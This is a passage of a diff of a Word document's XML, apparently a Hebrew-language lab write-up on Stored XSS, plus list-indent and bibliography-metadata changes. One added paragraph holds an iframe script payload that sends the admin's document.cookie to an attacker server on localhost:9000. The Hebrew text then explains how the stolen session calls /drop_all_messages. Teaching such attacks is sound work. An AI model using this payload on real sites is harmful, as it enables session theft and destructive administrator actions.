+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>iframe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> srcdoc="&lt;script&gt;fetch('http://localhost:9000/?cookie='+document.cookie)&lt;/script&gt;"&gt;&lt;/iframe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">הודעה זו מייצרת חלון קטן בתוך החלון הקיים בתוכו יש סקריפט ששולח לשרת התוקף את נתוני העוגיות, </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">בהם </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>ה</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>flusk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שעבורו שמור כי </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>הסשן</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הנוכחי הוא </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>סשן</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> של </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>אדמין</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>לאחר שליחת ההודעה, שרת ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Python </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">מתחיל להאזין על </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">localhost:9000 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>כאשר משתמש בעל הרשאות</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Administrator </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>טוען את עמוד הבית, הדפדפן שלו מפרש את תוכן ההודעה ומבצע בקשה לשרת המקומי. הבקשה כוללת את עוגיות ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">session </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>שהדפדפן יכול לקרוא</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>כאשר השרת ה</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>תוקף</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מקבל את הבקשה, הוא מחלץ ממנה את ערך ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cookie </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>ומשתמש בו כדי לשלוח בקשת</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> GET </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">לנתיב </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>drop_all_messages</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>באתר המטרה. מכיוון שהבקשה נשלחת עם ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">session </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>של המשתמש החזק, האתר מזהה אותה כבקשה של</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Administrator </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>ומוחק את כל ההודעות</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>ההתקפה מדגימה</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Stored XSS: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">משתמש חלש מחדיר תוכן שנשמר בשרת, ולאחר מכן מופעל בדפדפן של משתמש חזק. כך ניתן לבצע פעולה מנהלית ללא ידיעת סיסמת </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>האדמין</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>, אלא באמצעות ניצול ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">session </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>הפעיל שלו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="1226"/>
+        </w:tabs>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -649,7 +2488,7 @@
       <w:lvlText w:val="%1)"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
+        <w:ind w:left="360" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:cstheme="minorBidi" w:hint="default"/>
@@ -661,7 +2500,7 @@
       <w:lvlText w:val="%2."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
+        <w:ind w:left="1080" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
@@ -670,7 +2509,7 @@
       <w:lvlText w:val="%3."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="2160" w:hanging="180"/>
+        <w:ind w:left="1800" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
@@ -679,7 +2518,7 @@
       <w:lvlText w:val="%4."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
+        <w:ind w:left="2520" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
@@ -688,7 +2527,7 @@
       <w:lvlText w:val="%5."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
+        <w:ind w:left="3240" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
@@ -697,7 +2536,7 @@
       <w:lvlText w:val="%6."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="4320" w:hanging="180"/>
+        <w:ind w:left="3960" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
@@ -706,7 +2545,7 @@
       <w:lvlText w:val="%7."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
+        <w:ind w:left="4680" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
@@ -715,7 +2554,7 @@
       <w:lvlText w:val="%8."/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
+        <w:ind w:left="5400" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
     <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
@@ -724,7 +2563,7 @@
       <w:lvlText w:val="%9."/>
       <w:lvlJc w:val="right"/>
       <w:pPr>
-        <w:ind w:left="6480" w:hanging="180"/>
+        <w:ind w:left="6120" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
@@ -1662,4 +3501,16 @@
     </a:ext>
   </a:extLst>
 </a:theme>
+</file>
+
+<file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9482A113-068C-4F3F-B3F3-DBBD31A14BF6}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>